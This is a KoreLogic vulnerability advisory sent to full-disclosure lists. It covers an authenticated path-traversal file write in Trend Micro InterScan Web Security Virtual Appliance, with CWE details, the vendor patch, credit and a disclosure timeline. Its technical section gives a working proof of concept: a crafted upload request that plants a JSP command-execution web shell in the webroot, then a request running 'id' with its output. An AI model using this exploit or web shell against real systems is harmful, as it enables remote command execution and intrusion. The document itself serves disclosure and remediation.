KL-001-2017-001 : Trendmicro InterScan Arbitrary File Write

--i7WCP2rRU2OWW52We4mlpcIn1opup15oI
Content-Type: multipart/mixed; boundary="A6C0hufjuQvH9kPblp13jBSUL66pJhI8P";
 protected-headers="v1"
From: KoreLogic Disclosures <disclosures@korelogic.com>
To: fulldisclosure@seclists.org, bugtraq@securityfocus.com
Message-ID: <574aac49-0d95-ec17-acb3-e3fef46e70b9@korelogic.com>
Subject: KL-001-2017-001 : Trendmicro InterScan Arbitrary File Write

--A6C0hufjuQvH9kPblp13jBSUL66pJhI8P
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable

KL-001-2017-001 : Trendmicro InterScan Arbitrary File Write

Title: Trendmicro InterScan Arbitrary File Write
Advisory ID: KL-001-2017-001
Publication Date: 2017.02.15
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-20=
17-001.txt


1. Vulnerability Details

     Affected Vendor: Trendmicro
     Affected Product: InterScan Web Security Virtual Appliance
     Affected Version: OS Version 3.5.1321.el6.x86_64; Application
                       Version 6.5-SP2_Build_Linux_1548
     Platform: Embedded Linux
     CWE Classification: CWE-22: Improper Limitation of a Pathname to
                         a Restricted Directory (Path Traversal),
                         CWE-434: Unrestricted Upload of File with
                         Dangerous Type
     Impact: Remote Code Execution
     Attack vector: HTTP

2. Vulnerability Description

     An authenticated user can create files on the local system.
     This can lead to remote command execution as an authenticated
     user.

3. Technical Description

     A servlet takes an arbitrary file path as an output filename,
     and the webserver can create files in the webroot.  So, a
     malicious .jsp can be uploaded and then executed through a
     subsequent request to the webserver. Shell courtesy the
     fuzzdb-project
(https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/jsp/c=
md.jsp).

     POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=3Duploa=
d_check
HTTP/1.1
     Host: 1.3.3.7:8443
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)
Gecko/20100101 Firefox/49.0
     Accept: text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;=
q=3D0.8
     Accept-Language: en-US,en;q=3D0.5
     Accept-Encoding: gzip, deflate, br
     Referer: https://1.3.3.7:8443/config_backup_collapsed.jsp
     Cookie: JSESSIONID=3DE600D5296A2282C4C7AD46BCDAADEB47
     DNT: 1
     Connection: close
     Upgrade-Insecure-Requests: 1
     Content-Type: multipart/form-data;
boundary=3D---------------------------135470425518767155135967265
     Content-Length: 1486

     -----------------------------135470425518767155135967265
     Content-Disposition: form-data; name=3D"CSRFGuardToken"

     4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF
     -----------------------------135470425518767155135967265
     Content-Disposition: form-data; name=3D"op"

     save
     -----------------------------135470425518767155135967265
     Content-Disposition: form-data; name=3D"uploadfile";
filename=3D"../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/korelogic.js=
p"

     <%@ page import=3D"java.util.*,java.io.*"%>
     <HTML><BODY>
     <FORM METHOD=3D"GET" NAME=3D"myform" ACTION=3D"">
     <INPUT TYPE=3D"text" NAME=3D"cmd">
     <INPUT TYPE=3D"submit" VALUE=3D"Send">
     </FORM>
     <pre>
     <%
     if (request.getParameter("cmd") !=3D null) {
             out.println("Command: " + request.getParameter("cmd") + "<BR=
>");
             Process p =3D Runtime.getRuntime().exec(request.getParameter=
("cmd"));
             OutputStream os =3D p.getOutputStream();
             InputStream in =3D p.getInputStream();
             DataInputStream dis =3D new DataInputStream(in);
             String disr =3D dis.readLine();
             while ( disr !=3D null ) {
                     out.println(disr);
                     disr =3D dis.readLine();
                     }
             }
     %>
     </pre>
     </BODY></HTML>
     -----------------------------135470425518767155135967265
     Content-Disposition: form-data; name=3D"beFullyOrPartially"

     0
     -----------------------------135470425518767155135967265--

     HTTP/1.1 302 Found
     Server: Apache-Coyote/1.1
     Location:
https://1.3.3.7:8443/config_backup_collapsed.jsp?CSRFGuardToken=3D4POCBRS=
FC1TYEO2D5IHNLLJAX27BNBLF&errorMessage=3D6
     Content-Length: 0
     Date: Tue, 25 Oct 2016 14:36:07 GMT
     Connection: close

     GET /korelogic.jsp?CSRFGuardToken=3D4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF=
&cmd=3Did
HTTP/1.1
     Host: 1.3.3.7:8443
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)
Gecko/20100101 Firefox/49.0
     Accept: text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;=
q=3D0.8
     Accept-Language: en-US,en;q=3D0.5
     Accept-Encoding: gzip, deflate, br
     Referer: https://1.3.3.7:8443/korelogic.jsp
     Cookie: JSESSIONID=3DE600D5296A2282C4C7AD46BCDAADEB47
     DNT: 1
     Connection: close
     Upgrade-Insecure-Requests: 1

     HTTP/1.1 200 OK
     Server: Apache-Coyote/1.1
     Content-Type: text/html
     Content-Length: 320
     Date: Tue, 25 Oct 2016 14:37:58 GMT
     Connection: close

     <HTML><BODY>
     <FORM METHOD=3D"GET" NAME=3D"myform" ACTION=3D"">
     <input type=3D"hidden" name=3D"CSRFGuardToken"
value=3D"4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF">
     <INPUT TYPE=3D"text" NAME=3D"cmd">
     <INPUT TYPE=3D"submit" VALUE=3D"Send">
     </FORM>
     <pre>
     Command: id<BR>
     uid=3D498(iscan) gid=3D499(iscan) groups=3D499(iscan)

     </pre>
     </BODY></HTML>

4. Mitigation and Remediation Recommendation

     The vendor has issued a patch for this vulnerability in Version
     6.5 CP 1737. Security advisory and link to the patched version
     available at:

     https://success.trendmicro.com/solution/1116672

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2016.12.12 - KoreLogic sends vulnerability report and PoC to
                  Trendmicro.
     2016.12.15 - Trendmicro acknowledges receipt of report.
     2017.01.11 - Trendmicro informs KoreLogic that the patch to
                  this and other KoreLogic reported issues will
                  likely be available after the 45 business day
                  deadline (2017.02.16).
     2017.02.06 - Trendmicro informs KoreLogic that the patched
                  version will be available by 2017.02.14.
     2017.02.14 - Trendmicro security advisory released.
     2017.02.15 - KoreLogic public disclosure.

7. Proof of Concept

     See 3. Technical Description.


The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Polic=
y.v2.2.txt


--A6C0hufjuQvH9kPblp13jBSUL66pJhI8P--

--i7WCP2rRU2OWW52We4mlpcIn1opup15oI
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----

iQFOBAEBCAA4FiEE+cSrtp5jQJEtra70TWWaLA4ZiQwFAlik/1EaHGRpc2Nsb3N1
cmVzQGtvcmVsb2dpYy5jb20ACgkQTWWaLA4ZiQwcCgf/fP5Fqff33h/9agYkQlBs
/BDGPI2t+QWGK8uEXPIwqtrJmoUG3v2HUmR0LFxvGPh8nq+Hap+qLAdtgodhIatV
/xvBQHCo1xiKrb8xlkZHKghFpTgEzhoqtAl3h2jNanYrgj8v6UW2cuRhOvzIjwQM
PQC/NM4Ca4LmisCGKjVTw0hY4ER0v3QsEOeymTm+46YIEbVSwMxYAlI8P1QqlJTo
wJvZl2HeHZ5hgaVmFVYF6KG8TESZjXTWdw7Hba/cAeIL1CXSVX+VJE0KxXOdmhxA
uoGlkZyEGsUnnrwYCvVEWUj5rDPE09LnglWXKmnik9BlJguCqff1oQjIV7ZBbrWc
Vw==
=T9KD
-----END PGP SIGNATURE-----

--i7WCP2rRU2OWW52We4mlpcIn1opup15oI--